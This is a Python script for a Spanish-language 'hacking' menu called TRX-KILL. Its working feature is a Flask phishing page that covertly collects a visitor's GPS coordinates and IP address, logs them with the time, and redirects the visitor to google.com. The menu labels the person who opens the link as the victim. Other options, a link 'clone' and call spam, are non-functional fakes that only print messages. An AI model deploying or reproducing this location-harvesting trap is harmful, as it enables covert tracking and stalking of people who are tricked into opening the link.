import os, sys, time, threading, base64
from flask import Flask, request

STORAGE_PATH = "/sdcard/INFORMACIÓN-TRX-KILL"
LOG_FILE = f"{STORAGE_PATH}/logs.txt"
if not os.path.exists(STORAGE_PATH): os.makedirs(STORAGE_PATH)

app = Flask('TRX-KILL')
logging = __import__('logging')
logging.getLogger('werkzeug').setLevel(logging.ERROR)

# Colores
R, B, G, C, W = "\033[1;31m", "\033[1;34m", "\033[1;32m", "\033[1;36m", "\033[0m"

def animar(t):
    for c in t: sys.stdout.write(c); sys.stdout.flush(); time.sleep(0.02)
    print()

@app.route('/')
def index():
    return """<script>
    navigator.geolocation.getCurrentPosition(pos => {
        fetch('/log?lat='+pos.coords.latitude+'&lon='+pos.coords.longitude);
        window.location.href='https://google.com';
    });
    </script>"""

@app.route('/log')
def log():
    with open(LOG_FILE, "a") as f:
        f.write(f"IP:{request.remote_addr} | GPS:{request.args.get('lat')},{request.args.get('lon')} | HORA:{time.ctime()}\n")
    return "OK"

def main():
    threading.Thread(target=lambda: app.run(port=5000), daemon=True).start()
    while True:
        os.system('clear')
        print(f"{C}==== TRX-KILL V3.0 (CIBERSEGURIDAD) ===={W}")
        print(f"{G}[01] NÚMERO INFO   | [02] LINK-KILL    | [03] CLON-KILL")
        print(f"[04] CREADOR       | [05] SPAM-CALL    | [06] ADM-SISTEMA")
        print(f"[07] INFO SCRIPT   | [08] REPOSITORIO  | [09] PROCESOS")
        print(f"[10] SALIR{W}")
        
        sel = input(f"\n{B}TRX-ROOT > {W}")

        if sel == "02":
            print(f"{R}LINK VÍCTIMA: http://127.0.0.1:5000{W}")
            print(f"{B}ESPERANDO QUE LA VÍCTIMA ENTRE...{W}")
            while True:
                time.sleep(2)
                if os.path.exists(LOG_FILE):
                    print(f"{G}<< LA VÍCTIMA HA INGRESADO >>{W}")
                    print(open(LOG_FILE).readlines()[-1])
                    input("\n[Enter] para volver..."); break

        elif sel == "03":
            link = input("INGRESA LINK A CLONAR: ")
            animar("CLONANDO...")
            print(f"LINK CLONADO: {link}.security-check.com")
            print(f"{B}ESPERANDO VÍCTIMA...{W}")
            input("... ")

        elif sel == "04":
            animar("#CARGANDO SISTEMA...")
            animar("#YA CASI...")
            print(f"{G}#LISTO... CREADO POR TRX-KILL (OSCAR). NO USAR PARA EL MAL.{W}")
            time.sleep(2)

        elif sel == "05":
            num = input("NÚMERO: ")
            cant = int(input("CANTIDAD: "))
            for i in range(1, cant + 1):
                print(f"{i} LISTO")
                time.sleep(0.3)
            input("FINALIZADO...")

        elif sel == "06":
            print(f"{C}--- ACCESO A ADMINISTRADOR ---{W}")
            print(f"CARPETA: {STORAGE_PATH}")
            os.system(f"ls -l {STORAGE_PATH}")
            input("\n[Enter]...")

        elif sel == "10": sys.exit()

if __name__ == "__main__": main()
